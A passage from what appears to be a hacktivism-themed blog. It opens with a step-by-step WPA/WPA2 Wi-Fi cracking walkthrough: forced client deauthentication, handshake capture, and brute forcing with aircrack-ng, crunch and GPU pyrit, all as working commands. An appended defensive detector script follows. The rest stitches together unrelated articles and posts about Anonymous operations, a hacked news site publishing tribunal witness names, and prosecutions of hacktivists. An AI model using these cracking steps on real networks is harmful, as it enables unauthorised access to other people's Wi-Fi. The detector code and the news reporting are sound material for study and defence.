airodump-ng -c 3 -w wpacrack --bssid ff:ff:ff:ff:ff:ff --ivs mon0

*where -c is the channel
           -w is the file to be written
           --bssid is the BSSID

Keep this terminal running.

Step 6 :

Open another terminal.

aireplay-ng -0 1 -a ff:ff:ff:ff:ff:ff -c 99:88:77:66:55:44 mon0

*where -a is the BSSID
           -c is the client MAC address (STATION)

Wait for the handshake.

Step 7 :

Use the John the Ripper word list to crack the WPA/WPA2 password.

aircrack-ng -w /pentest/passwords/john/password.lst wpacrack-01.ivs

Step 8 (Optional) :

If you do not want to use the John the Ripper word list, you can use Crunch.

Go to the official site of crunch.
http://sourceforge.net/projects/crunch-wordlist/files/crunch-wordlist/

Download crunch 3.0 (the current version at the time of this writing).
http://sourceforge.net/projects/crunch-wordlist/files/crunch-wordlist/crunch-3.0.tgz/download

tar -xvzf crunch-3.0.tgz
cd crunch-3.0
make
make install


/pentest/passwords/crunch/crunch 8 16 -f /pentest/passwords/crunch/charset.lst mixalpha-numeric-all-space-sv | aircrack-ng wpacrack-01.ivs -b ff:ff:ff:ff:ff:ff -w -

*where
8 16 is the length of the password, i.e. from 8 characters to 16 characters.

(B) nVidia Display Card with CUDA

If you have an nVidia card with CUDA, you can use pyrit to crack the password with crunch.

Step a :

airmon-ng

The result will be something like :

Interface    Chipset      Driver
wlan0        Intel 5100   iwlagn - [phy0]



Step b :

airmon-ng start wlan0

Step c (Optional) :

Change the mac address of the mon0 interface.

ifconfig mon0 down
macchanger -m 00:11:22:33:44:55 mon0
ifconfig mon0 up


Step d :

airodump-ng mon0

Then, press "Ctrl+c" to break the program.

Step e :

airodump-ng -c 3 -w wpacrack --bssid ff:ff:ff:ff:ff:ff mon0

Step f :

Open another terminal.

aireplay-ng -0 1 -a ff:ff:ff:ff:ff:ff -c 99:88:77:66:55:44 mon0

*where -a is the BSSID
           -c is the client MAC address (STATION)

Wait for the handshake.

Step g :

If the following packages are not yet installed, install them.

apt-get install libghc6-zlib-dev libssl-dev python-dev libpcap-dev python-scapy

Step h :

Go to the official site of crunch.
http://sourceforge.net/projects/crunch-wordlist/files/crunch-wordlist/

Download crunch 3.0 (the current version at the time of this writing).
http://sourceforge.net/projects/crunch-wordlist/files/crunch-wordlist/crunch-3.0.tgz/download

tar -xvzf crunch-3.0.tgz
cd crunch-3.0
make
make install


Step i :

Go to the official site of pyrit.

http://code.google.com/p/pyrit/downloads/list

Download pyrit and cpyrit-cuda (the current version is 0.4.0 at the time of this writing).

tar -xzvf pyrit-0.4.0.tar.gz
cd pyrit-0.4.0
python setup.py build
sudo python setup.py install


tar -xzvf cpyrit-cuda-0.4.0.tar.gz
cd cpyrit-cuda-0.4.0
python setup.py build
sudo python setup.py install


Step j :

/pentest/passwords/crunch/crunch 8 16 -f /pentest/passwords/crunch/charset.lst mixalpha-numeric-all-space-sv | pyrit --all-handshakes -r wpacrack-01.cap -b ff:ff:ff:ff:ff:ff -i - attack_passthrough

*where
8 16 is the length of the password, i.e. from 8 characters to 16 characters.

Step k (Optional) :

If you encounter an error when reading wpacrack-01.cap, do the following step.

pyrit -r wpacrack-01.cap -o new.cap stripLive

/pentest/passwords/crunch/crunch 8 16 -f /pentest/passwords/crunch/charset.lst mixalpha-numeric-all-space-sv | pyrit --all-handshakes -r new.cap -b ff:ff:ff:ff:ff:ff -i - attack_passthrough

*where
8 16 is the length of the password, i.e. from 8 characters to 16 characters.

Step l :

Then, you will see something similar to the following.

Pyrit 0.4.0 (C) 2008-2011 Lukas Lueg http://pyrit.googlecode.com
This code is distributed under the GNU General Public License v3+

Parsing file 'new.cap' (1/1)...
Parsed 71 packets (71 802.11-packets), got 55 AP(s)

Tried 17960898 PMKs so far; 17504 PMKs per second.


Remarks :

If you have an nVidia GeForce GTX460 (336 CUDA cores), the speed of cracking is about 17,000 passwords per second.

To test if your wireless card (either USB or PCI-e) can do the injection or not :

airodump-ng mon0

Open another terminal.

aireplay-ng -9 mon0

Make sure pyrit works on your system :

pyrit list_cores

That's all! See you.
Thank you, and please follow my blog.
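
Seen from the defender's side, the deauthentication in Step 6 followed by the client's fresh handshake is a pattern a wireless IDS sensor can flag. The Python example below is added here and is not part of the original post; the CSV record layout, the sample frames and every MAC address are constructed assumptions.

```python
from collections import namedtuple

Frame = namedtuple("Frame", "ts kind src dst bssid")
Alert = namedtuple("Alert", "bssid client deauth_ts handshake_ts")

BROADCAST = "ff:ff:ff:ff:ff:ff"

# Constructed sensor export (not from the original post); every MAC address
# is made up. Assumed columns: epoch seconds, frame kind, source,
# destination, BSSID.
SAMPLE_FRAMES = """\
# ts,kind,src,dst,bssid
40.00,assoc-req,02:cc:cc:cc:cc:11,02:aa:aa:aa:aa:01,02:aa:aa:aa:aa:01
40.30,eapol,02:aa:aa:aa:aa:01,02:cc:cc:cc:cc:11,02:aa:aa:aa:aa:01
40.35,eapol,02:cc:cc:cc:cc:11,02:aa:aa:aa:aa:01,02:aa:aa:aa:aa:01
105.50,deauth,02:aa:aa:aa:aa:01,02:cc:cc:cc:cc:10,02:aa:aa:aa:aa:01
105.52,deauth,02:aa:aa:aa:aa:01,02:cc:cc:cc:cc:10,02:aa:aa:aa:aa:01
106.10,assoc-req,02:cc:cc:cc:cc:10,02:aa:aa:aa:aa:01,02:aa:aa:aa:aa:01
106.40,eapol,02:aa:aa:aa:aa:01,02:cc:cc:cc:cc:10,02:aa:aa:aa:aa:01
106.45,eapol,02:cc:cc:cc:cc:10,02:aa:aa:aa:aa:01,02:aa:aa:aa:aa:01
106.50,eapol,02:aa:aa:aa:aa:01,02:cc:cc:cc:cc:10,02:aa:aa:aa:aa:01
106.55,eapol,02:cc:cc:cc:cc:10,02:aa:aa:aa:aa:01,02:aa:aa:aa:aa:01
300.00,deauth,02:cc:cc:cc:cc:11,02:aa:aa:aa:aa:01,02:aa:aa:aa:aa:01
400.00,eapol,02:aa:aa:aa:aa:01,02:cc:cc:cc:cc:11,02:aa:aa:aa:aa:01
"""


def parse_frames(text):
    """Parse the assumed CSV export into Frame records sorted by time."""
    frames = []
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        ts, kind, src, dst, bssid = (p.strip().lower() for p in line.split(","))
        frames.append(Frame(float(ts), kind, src, dst, bssid))
    return sorted(frames, key=lambda f: f.ts)


def _client_of(frame):
    """Return the non-AP end of a frame exchanged between an AP and a client."""
    return frame.dst if frame.src == frame.bssid else frame.src


def find_forced_handshakes(frames, window=10.0):
    """Flag 4-way handshakes that start within `window` seconds of a deauth.

    A deauthentication aimed at one client (or at broadcast) followed almost
    immediately by that client's EAPOL handshake is the sequence produced
    when someone forces a reconnect in order to record the handshake.
    """
    pending = {}   # (bssid, client or broadcast) -> time of latest deauth
    seen = set()   # (bssid, client, deauth time) already reported
    alerts = []
    for f in frames:
        if f.kind == "deauth":
            pending[(f.bssid, _client_of(f))] = f.ts
        elif f.kind == "eapol":
            client = _client_of(f)
            # A directed deauth takes priority over a broadcast one.
            for key in ((f.bssid, client), (f.bssid, BROADCAST)):
                ts = pending.get(key)
                if ts is None or f.ts - ts > window:
                    continue
                mark = (f.bssid, client, ts)
                if mark not in seen:
                    # Report once per deauth, not once per EAPOL message.
                    seen.add(mark)
                    alerts.append(Alert(f.bssid, client, ts, f.ts))
                break
    return alerts


if __name__ == "__main__":
    for a in find_forced_handshakes(parse_frames(SAMPLE_FRAMES)):
        print("deauth at %.2f then handshake at %.2f: client %s on %s"
              % (a.deauth_ts, a.handshake_ts, a.client, a.bssid))
```

Legitimate roaming can produce the same sequence, so an alert is a lead to investigate rather than proof. Enabling 802.11w protected management frames and using a long random passphrase are the matching mitigations.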

Monday, April 15, 2013

How Anonymous have become digital culture's protest heroes

'Anonymous' core strength lies in its PR tactics, not its boots-on-the-ground protests or actual hacking skills.' Photograph: Benjamin Larderet/Demotix/Corbis
In 2007, the hacktivist collective Anonymous was dubbed the "internet hate machine" by Fox News for their trolling campaigns. Six years later, they are the white knights of the digital realm, seeking justice for the now deceased 17-year-old Rehtaeh Parsons, an alleged gang rape victim who killed herself after bullying by her Nova Scotian classmates. This is just one of the collective's high profile causes in the past week, but in terms of good PR and an agency for change, it compares to their actions on Steubenville.
They call it #OpJustice4Rehtaeh on Twitter, and all types of people – from journalists and teens to women who normally wouldn't associate with Anonymous – have been spreading Anonymous' related material in the name of Parsons since Tuesday, after news of her mother turning off her daughter's life support made global headlines.
The concerned non-Canadians and feminists in faraway places that joined in the online protest don't consider themselves "hacktivists", nor are they afraid of the FBI or their peers labeling them as terrorist sympathisers. The spooky criminal portrayal of Anonymous has melted from the public consciousness, to be replaced with an image of strangers in pale masks passionate about improving society, one cause at a time. Since Anonymous causes are varied and inspired by current events, jumping on this form of vigilante-motivated activism – or what some would call clicktivism – has never been more popular. Or as in Parsons' case, as effective.
The goal of #OpJustice4Rehtaeh was to seek justice primarily by getting the Canadian justice and police department to review her case. None of the four teen assailants were convicted despite capturing, and then spreading photographic evidence of their alleged crime at Parsons' school.
A Change.org petition by Parsons' mother was heavily circulated, and it hit 100,000 signatures within days. "For the love of God do something", wrote Parsons' father on Wednesday in a personal blogpost addressing the justice minister of Nova Scotia. His words validated #OpJustice4Rehtaeh, launched the day before.
Anonymous' successful leveraging of the press and social media helped them identify the four rapists in just a few hours, which they then threatened to disclose unless their demands were met. No hacking was involved as this time, Anonymous was apparently a friendly tip line.
They were able to get this information so quickly, wrote an Anon on Pastebin, because "dozens of emails were sent to us by kids and adults alike, most of whom had personal relationships with the alleged rapists. Many recalled public confessions made blatantly by these boys in public where they detailed the rape of an inebriated 15-year-old girl." Why this same information was not sent to the police at the time of the investigation over a year ago is not apparent, though Anonymous hinted it sent this information to the Royal Canadian Mounted Police (RCMP) in a more recent release.
Despite a Canadian minister previously telling the media the case was closed and would not be reopened, by Thursday the tune had changed, proving the collective's efforts were not in vain. In addition to submitting new evidence to the RCMP and putting pressure on the Canadian Department of Justice, Anonymous organised a rally outside the Halifax police department on Sunday. Roughly 100 people attended, including Parsons' mother. Speaking on her behalf as her partner, Jason Barnes told Canada's Herald News in an interview, "Leah's been… very happy with the things that Anonymous has done for us and really stepped forward and made this a large enough issue to make people think, and see it." Out of all the operations recently carried out by Anonymous, #OpJustice4Rehtaeh has had an incredibly high "effect real change" rate of just a few days.
Before you scoff at Anonymous expertly using PR and social media to change the world, consider this: Obama's technical team for his re-election campaign in 2012 took measures to DDoS-proof their websites as well as avoid Anonymous' attention at all costs. Anonymous expert and author Gabriella Coleman shared with me a forthcoming report for the Centre for International Governance Innovation which states:
"Anonymous was treated as (potentially) even more of a nuisance than, say, the foreign state hackers who infiltrated the McCain and Obama campaigns in 2008. Had Anonymous successfully accessed servers or DDoS the campaign website, it would likely have ignited colossal media attention and potentially battered the campaign's reputation. Although this alone would likely not put Obama's chances for re-election at risk (the team was confident there was no controversial information to leak), a visit from Anonymous was treated as a real possibility and liability."
Anonymous' core strength lies in its PR tactics, not its boots-on-the-ground protests or actual hacking skills. Besides #OpJustice4Rehtaeh, in the last week Anonymous attacked North Korean social media accounts, then Israeli websites in solidarity with the Palestinians. While both operations apparently caused no substantial impact (North Korea is still a dictatorship, and Israel hasn't changed its stance on Palestine), they were both highly publicised, which is enough of a win for the group now primarily concerned with mobilising activists through the spread of information. In fact, Anonymous has been making headlines on an almost weekly basis for over a year now.
Australian security expert Stilgherrian calls this adoption of multiple causes, going beyond Anonymous's initial defence of internet freedoms, as proof they have become the "Hello Kitty of activism," but Coleman likens Anonymous's current, accepting form to something more organic: a fungus. "They refuse to die and they seem to bud in new places and situations," she explains. "They spore and spread" around the globe because clicktivism is easy and fitting with our already established digital habits.
There isn't enough bleach on the internet to kill the spread, but it looks like we web citizens wouldn't want to even if we had enough chemicals. We've all been infected in one way or another now, and our participation, however small, has evolved the fungus into something more manageable. Regarding the Parsons case, Anonymous is now withholding the names of the minors involved "out of respect for Rehtaeh's mother." The internet's love machine is a more fitting nickname.

Anonymous Operation Bahrain





Operation Bahrain Twitter CLICK HERE

Op Comms IRC Channel CLICK HERE

Anonymous Care Package v 2.0 DOWNLOAD HERE

Press Release READ HERE

Operational Information CLICK HERE






Sunday, April 14, 2013

#OpJustice4Rehtaeh demonstration in Halifax has started now. LIVE


Anonymous Insiders Tales: April 2013 – Volume 1 Issue 1

So far it has been a pretty busy month for anons. We really overdid ourselves in the last weeks. We start our stories in the Middle East :

#OpIsrael v2.0

A few months ago we made Israel stop firing rockets at Gaza but it appears that they wanted to resume their shenanigans where they left them. Anons said no way, hosay and went to the barricades. Some say we did over 3 millions in damages to Israel cyberspace. But of course Israel is butthurt and say we didn’t do anything.
But seriously, it was the best freaking internet riot ever. It was so massive! Never in the history of hackers so many groups allied for the same goal. An insane 24 hours of tango downs, leaks, counter hacks and failed psyops.

YAN project

@YourAnonNews announced a new project and started to gather funds. They gathered 32 grands as of writing. It pissed TimCast and other anons very much. U MAD BRO???? It’s awesome to see that the people trust us enough to give us all that money. <3

Justice for Rehtaeh Parsons

This is the sad story of another girl who saw her life destroyed by rapists in the small community of Cole Harbour, Nova Scotia. Literally destroyed when she took her own life. Turns out Anonymous does not take kindly to rape and cyberbullying and the collective grabbed its Sherlock Holmes cape. The game was afoot very briefly. They were allegedly able to identify the rapists in 24 hours and told the police they could help.
But the police didn’t like it at all
Police : “If Anonymous want to work with us then they better drop their masks.”
Anons : “If the police want to work with us then they better put on a mask.”
The #lulz!

#OpGabon

There’s really some things you can’t imagine exist or at least, just you don’t want to. Turns out there’s a place in Africa where politicians and cults kill kids to eat them. It’s worse than taxes. And yuck! That’s really gross. We really don’t like yucky things unless they are on /b/.

Biggest twitter storm ever

There’s crappy stuff everywhere but don’t worry, we will fix it! Muslims were getting massacred in Rohingya and nobody dared talking about it. We did. And we broke the most hugenormous twitterstorm ever!
It’s been said : Anonymous taught twitter about the Rohingya genocide. Over 100,000 mentions in 24 hours (graph). Are we bad ass or what !?
People started to ask the Dalai Lama for peace. But X came and told everyone to shut up since he’s a know-it-all Buddhist masta.

AnonRelations drama

Anons always live up to their drama queens reputation and it turns out AnonRelations.net put up a pretty good act. Malice got really pissed off and stirred a massive shitstorm. Sage went all rage quit “YAAAAARRRRR!!!”. Therefore AnonRelations was pronounced dead only to come back to life two weeks later. Zombie movies have nothing on us.
Bravo! Amazing acting guys….mmmmmm

IRC Quote of the Week

<dmzpkts> Change only happens at the barrel of a gun.. but no one ever said, that the gun cant be a digital one.

And also

/b/ cats
Don’t forget! Internet is serious biz. Serious serious…

Get Anonymous Insiders tales each week!

Hackers Post Witness List in Trial on Ex-Premier’s Death

PARIS — Hackers broke into a major Lebanese news Web site and plastered the front page with the names of the so-called secret witnesses for the trial in the killing of the former Prime Minister Rafik Hariri in an apparent bold, new move to intimidate witnesses and derail the trial.

The hacking of the Beirut newspaper last week came on the heels of an earlier publication by another Lebanese newspaper that named 32 witnesses in the trial, which is planned to begin this year. Progress in the case at the United Nations-backed Special Tribunal for Lebanon has been delayed for years by blocked investigations in Beirut, the killing of a Lebanese investigator, the near-killing of another and the court’s bureaucracy.
A spokesman for the tribunal denounced the hacking operation, warning that the authors were endangering the lives of Lebanese citizens. “It is part of the continuing campaign to undermine the tribunal and intimidating all of the witnesses,” the spokesman, Marten Youssef, said Friday.
International criminal tribunals have been confronted by threats to witnesses and the disclosure of confidential materials before, and a number of lawyers and journalists have been prosecuted for contempt of court. But until now, international courts have not faced a cyberattack of this scale, according to lawyers in The Hague.
The hackers broke into the Web site of the newspaper Al Mustaqbal and listed personal data for 167 Lebanese men, including their names, passport pictures, their places and years of birth, cities of residence and professions. The text in Arabic and English said that the information about the witnesses was leaked by the tribunal.
Mr. Youssef said that the list published by the hackers was not “an accurate reflection of the official court records,” but he gave no further details.
What has unfolded is an opaque story full of twists that is now under investigation by the tribunal, the attorney general of Lebanon and the police in the Netherlands, where the tribunal is based.
It began Tuesday morning when the newspaper Al Mustaqbal discovered that the front page of its Web site had been taken over by the purported secret witness list, causing much consternation in a small country where many people know one another.
The newspaper was owned by Mr. Hariri and still belongs largely to his family.
The hackers also directed visitors to a Web site called “Journalists for the Truth,” lawyers said.
“We are a group of journalists seeking to unveil corruption in the Special Tribunal for Lebanon,” the Web site said, adding that it aimed to prove “bribery” and “prejudice and non-professionalism” of court officials. It also said its mission was to provide legal support to the witnesses “who face daily temptation or pressure” from tribunal staff.
In what seemed a surreal spin on a Web site that was itself simultaneously publishing the so-called witness list, the site blamed court officials for leaking the confidential information and said that this was an act that “posed a threat to the lives of many witnesses.”
The Journalists for the Truth site revealed no names or news media affiliation, only an e-mail address. The Dutch police said they had traced the Web site to a registry in the Netherlands, but they said its owners were still unknown.
A Lebanese lawyer familiar with the case who spoke on the condition of anonymity said he believed the hackers were supporters of the militant movement Hezbollah, which has long campaigned against the court.
The Hezbollah leadership has consistently denied any connection with the Hariri killing and has said it would not cooperate with the tribunal. The tribunal has charged four Hezbollah members in connection with the bombing of Mr. Hariri’s car as it drove down a seaside boulevard in Beirut in 2005. The location of the four is unknown, and they would be tried in absentia.
Hezbollah officials could not be reached for comment, but the group has previously denied any involvement in the bombing and denounced the tribunal as a tool of the United States and Israel.
In Paris last week, Saad Hariri, the dead prime minister’s son, who has also served as prime minister, called the hacking and the publication of the possible witnesses in his father’s case “a criminal act.” He insisted that the tribunal would continue its work and reveal who killed his father and a number of his supporters.
For the tribunal, which faces opposition in Lebanon from Hezbollah and its supporters, the listing of names and photographs is a second major setback this year.
In January, the newspaper Al Akhbar, which is close to Hezbollah, published similar “confidential” lists, revealing pictures and personal details of 32 people it said were witnesses in the case. But the newspaper stopped after it received a warning from Lebanon’s attorney general that it was violating judges’ orders of confidentiality.
Mr. Youssef, the tribunal spokesman, said the prosecution had prepared a still undisclosed list of 500 potential witnesses. But he declined to say whether the published names were among them. “As a court, we are obviously concerned about the safety of legitimate witnesses,” he said, “they are among the most important component of the trial.”
Mr. Youssef added that the anonymous “journalists’ group” was not credible. “Let them reveal their identity, and we will engage with any critics,” he said.
A lawyer in The Hague, familiar with the tribunal’s work, called the listing of names an astonishing maneuver. “Without firing a shot or beating up anyone,” he said, “they’ll manage to scare away all the witnesses.”

Hacktivists as Gadflies

Around 400 B.C., Socrates was brought to trial on charges of corrupting the youth of Athens and “impiety.” Presumably, however, people believed then as we do now, that Socrates’ real crime was being too clever and, not insignificantly, a royal pain to those in power or, as Plato put it, a gadfly. Just as a gadfly is an insect that could sting a horse and prod it into action, so too could Socrates sting the state. He challenged the moral values of his contemporaries and refused to go along with unjust demands of tyrants, often obstructing their plans when he could. Socrates thought his service to Athens should have earned him free dinners for life. He was given a cup of hemlock instead.
The government is treating hackers who try to make a political point as serious threats.
We have had gadflies among us ever since, but one contemporary breed in particular has come in for a rough time of late: the “hacktivist.” While none have yet been forced to drink hemlock, the state has come down on them with remarkable force. This is in large measure evidence of how poignant, and troubling, their message has been.
Hacktivists, roughly speaking, are individuals who redeploy and repurpose technology for social causes. In this sense they are different from garden-variety hackers out to enrich only themselves. People like Steve Jobs, Steve Wozniak and Bill Gates began their careers as hackers — they repurposed technology, but without any particular political agenda. In the case of Mr. Jobs and Mr. Wozniak, they built and sold “blue boxes,” devices that allowed users to defraud the phone company. Today, of course, these people are establishment heroes, and the contrast between their almost exalted state and the scorn being heaped upon hacktivists is instructive.
Brecht Vandenbroucke
For some reason, it seems that the government considers hackers who are out to line their pockets less of a threat than those who are trying to make a political point. Consider the case of Andrew Auernheimer, better known as “Weev.” When Weev discovered in 2010 that AT&T had left private information about its customers vulnerable on the Internet, he and a colleague wrote a script to access it. Technically, he did not “hack” anything; he merely executed a simple version of what Google Web crawlers do every second of every day — sequentially walk through public URLs and extract the content. When he got the information (the e-mail addresses of 114,000 iPad users, including Mayor Michael Bloomberg and Rahm Emanuel, then the White House chief of staff), Weev did not try to profit from it; he notified the blog Gawker of the security hole.
For this service Weev might have asked for free dinners for life, but instead he was recently sentenced to 41 months in prison and ordered to pay a fine of more than $73,000 in damages to AT&T to cover the cost of notifying its customers of its own security failure.
When the federal judge Susan Wigenton sentenced Weev on March 18, she described him with prose that could have been lifted from the prosecutor Meletus in Plato’s “Apology.” “You consider yourself a hero of sorts,” she said, and noted that Weev’s “special skills” in computer coding called for a more draconian sentence. I was reminded of a line from an essay written in 1986 by a hacker called the Mentor: “My crime is that of outsmarting you, something that you will never forgive me for.”
When offered the chance to speak, Weev, like Socrates, did not back down: “I don’t come here today to ask for forgiveness. I’m here to tell this court, if it has any foresight at all, that it should be thinking about what it can do to make amends to me for the harm and the violence that has been inflicted upon my life.”
He then went on to heap scorn upon the law being used to put him away — the Computer Fraud and Abuse Act, the same law that prosecutors used to go after the 26-year-old Internet activist Aaron Swartz, who committed suicide in January.
The law, as interpreted by the prosecutors, makes it a felony to use a computer system for “unintended” applications, or even violate a terms-of-service agreement. That would theoretically make a felon out of anyone who lied about their age or weight on Match.com.
The case of Weev is not an isolated one. Barrett Brown, a journalist who had achieved some level of notoriety as “the former unofficial not-spokesman for Anonymous,” the hacktivist group, now sits in federal custody in Texas. Mr. Brown came under the scrutiny of the authorities when he began poring over documents that had been released in the hack of two private security companies, HBGary Federal and Stratfor. Mr. Brown did not take part in the hacks, but he did become obsessed with the contents that emerged from them — in particular the extracted documents showed that private security contractors were being hired by the United States government to develop strategies for undermining protesters and journalists, including Glenn Greenwald, a columnist for Salon. Since the cache was enormous, Mr. Brown thought he might crowdsource the effort and copied and pasted the URL from an Anonymous chat server to a Web site called Project PM, which was under his control.
Just to be clear, what Mr. Brown did was repost the URL from a Web site that was publicly available on the Internet. Because Stratfor had not encrypted the credit card information of its clients, the information in the cache included credit card numbers and validation numbers. Mr. Brown didn’t extract the numbers or highlight them; he merely offered a link to the database. For this he was charged on 12 counts, all of which pertained to credit card fraud. The charges against him add up to about 100 years in federal prison. It was “virtually impossible,” Mr. Greenwald wrote recently in The Guardian, his new employer, “to conclude that the obscenely excessive prosecution he now faces is unrelated to that journalism and his related activism.”
Other hacktivists have felt the force of the United States government in recent months, and all reflect an alarming contrast between the severity of the punishment and the flimsiness of the actual charges. The case of Aaron Swartz has been well documented. Jeremy Hammond, who reportedly played a direct role in the Stratfor and HBGary hacks, has been in jail for more than a year awaiting trial. Mercedes Haefer, a journalism student at the University of Nevada, Las Vegas, faces charges for hosting an Internet Relay Chat channel where an Anonymous denial of service attack was planned. Most recently, Matthew Keys, a 26-year-old social-media editor at Reuters, who allegedly assisted hackers associated with Anonymous (who reportedly then made a prank change to a Los Angeles Times headline), was indicted on federal charges that could result in more than $750,000 in fines and prison time, inciting a new outcry against the law and its overly harsh enforcement. The list goes on.
In a world in which nearly everyone is technically a felon, we rely on the good judgment of prosecutors to decide who should be targets and how hard the law should come down on them. We have thus entered a legal reality not so different from that faced by Socrates when the Thirty Tyrants ruled Athens, and it is a dangerous one. When everyone is guilty of something, those most harshly prosecuted tend to be the ones that are challenging the established order, poking fun at the authorities, speaking truth to power — in other words, the gadflies of our society.

ANONYMOUS SCREWS UP, NAMES INNOCENT PERSON AS PART OF RAPE GANG IN NEW CASE

A short while back, an article appeared about a teenaged girl who was raped and had a photo of the rape in progress posted on the internet by one of the rapists, who bragged about it. The teen attempted to commit suicide and had been on life support since 2011 until she was recently removed from life support and passed away.

http://mashable.com/2013/04/11/father-suicide-victim/

Somehow, Anonymous got involved and started #OpJustice4Rehtaeh with the intent of getting justice for Rehtaeh.

Charges that law enforcement, in this case the RCMP along with local law enforcement, either screwed the case up or covered it up began to surface. A peace rally scheduled for Sunday, April 14th was announced and soon Anonymous was posting Pastebin messages about this new OP.

Then comes their big screw up. They named someone as part of the gang rape who is completely innocent.


Things soon got out of control as many on the internet who have been following the case and Anonymous’s part in it started spreading the name around and “researching” him.

It has reached the point where the mother of the deceased girl has asked Anonymous to quit naming suspects.

Good intentions or not, this is why Anonymous should butt out of making all these OPS and barging into these high profile cases. Once again they have put the safety and security of innocent victims at risk. They have done more damage than good.

Editor's note: There seems to be a debate regarding who it was that disclosed the name of the innocent victim. A number of people are stating that Anonymous did not directly name the individual.

http://www.telegraph.co.uk/news/worldnews/northamerica/canada/9987383/Anonymous-we-will-name-rapists-of-suicide-victim-Rehtaeh-Parsons.html

In the article is this quote:

“In a video statement, Anonymous said it had already identified two of the alleged attackers and were “currently confirming a third”. The group said it was “only a matter of time” before they found the fourth.”

I may have misread the article and was under the impression that Anonymous had made these two names public. The problem remains, however, that Anonymous has created a vigilante atmosphere regarding the case and the name of an innocent victim had been made public and is now all over the internet.

There is also this excerpt to take into consideration in regards to Anonymous barging into this case:

“Justice Minister Ross Landry, who reportedly met with Rehtaeh’s mother yesterday, condemned the threats, saying: “Leah [Parsons] said she didn’t want harm to come to the other young people, that her daughter would not have wanted that.”

It is clear from that excerpt that the mother does not approve of Anonymous’s actions.

Only time will tell how badly innocent lives will be destroyed once again by this reckless and haphazard group.

Stay tuned
